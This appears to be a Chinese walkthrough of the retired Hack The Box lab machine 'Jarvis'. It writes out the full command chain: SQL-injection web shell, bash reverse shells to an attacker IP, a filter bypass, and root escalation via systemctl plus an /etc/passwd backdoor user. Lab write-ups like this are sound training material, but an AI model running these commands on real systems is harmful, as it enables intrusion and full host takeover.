本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.143
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.143 -o ./Jarvis-autorecon
访问web应用测试发现存在sql注入
直接写入一句话
通过一句话执行命令
curl -X POST http://10.10.10.143/bmfx.PHP --data-urlencode exec=whoami
测试没问题直接反弹shell
curl -X POST http://10.10.10.143/bmfx.PHP --data-urlencode 'exec=bash -c "bash -i >& /dev/tcp/10.10.14.3/8833 0>&1"'
拿到低权限shell之后执行sudo -l
发现了一个python脚本,可以执行ping命令,看了代码过滤了一些常见的命令执行参数,这里可以通过$()进行绕过
切换到用户pepper但是无法回显,使用nc反弹shell然后写入kali的公钥,使用公钥去连接目标普通用户
本地kali 去连接
查找权限是4000的文件
find / -perm -4000 2>/dev/null
发现可以通过systemctl进行提权
systemctl提权 https://www.freedesktop.org/software/systemd/man/systemctl.html https://gtfobins.github.io/gtfobins/systemctl/ echo 'bash -c "bash -i >& /dev/tcp/10.10.14.3/8855 0>&1"' > /tmp/shit.sh 或者直接添加uid为0的用户/tmp/shit.sh /bin/bash echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd 密码为AAAA chmod +x /tmp/shit.sh cd /home/pepper echo '[Service] Type=oneshot ExecStart=/bin/sh -c "/tmp/shit.sh" [Install] WantedBy=multi-user.target' > bmfxshitd.service systemctl link /tmp/bmfxshitd.service systemctl start bmfxshitd.service
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
